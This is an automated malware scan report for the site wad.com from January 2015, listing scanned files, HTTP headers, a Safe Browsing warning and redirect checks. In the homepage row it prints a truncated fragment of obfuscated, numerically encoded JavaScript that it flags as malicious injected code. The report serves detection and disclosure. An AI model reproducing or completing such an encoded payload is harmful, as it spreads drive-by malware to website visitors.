Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wad.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wad.com/ | 200 OK Content-Length: 17473 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,165,165,167,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,165,165,167,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,151,160,147,163,161,151,160,155,152,151,62,162,151,170,63,135,116,147,161,175,166,133,165,62,164,154,164,53,77,21,16,44,165,165,1 Antivirus reports:
| ||
http://wad.com/jquery-1.js | 200 OK Content-Length: 100196 Content-Type: application/javascript | clean |
http://wad.com/jquery.js | HTTP/1.1 302 Found Connection: close Date: Fri, 09 Jan 2015 22:48:28 GMT Location: http://www.wad.com/index.html Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 324 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.wad.com/index.html | HTTP/1.1 302 Found Connection: close Date: Fri, 09 Jan 2015 22:48:28 GMT Location: http://www.wad.com/index.html Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.wad.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 09 Jan 2015 22:48:29 GMT Location: http://www.wad.com/index.html Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 | clean |
http://wad.com/maxlength.js | 200 OK Content-Length: 2950 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wad.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 09 Jan 2015 22:48:26 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=433493de931869c73fed3f9815f21407; path=/
X-Powered-By: PHP/5.2.6-1+lenny13
GET / HTTP/1.1
Host: wad.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 09 Jan 2015 22:48:26 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=433493de931869c73fed3f9815f21407; path=/
X-Powered-By: PHP/5.2.6-1+lenny13
Second query (visit from search engine):
GET / HTTP/1.1
Host: wad.com
Referer: http://www.google.com/search?q=wad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wad.com
Referer: http://www.google.com/search?q=wad.com
Result:
The result is similar to the first query. There are no suspicious redirects found.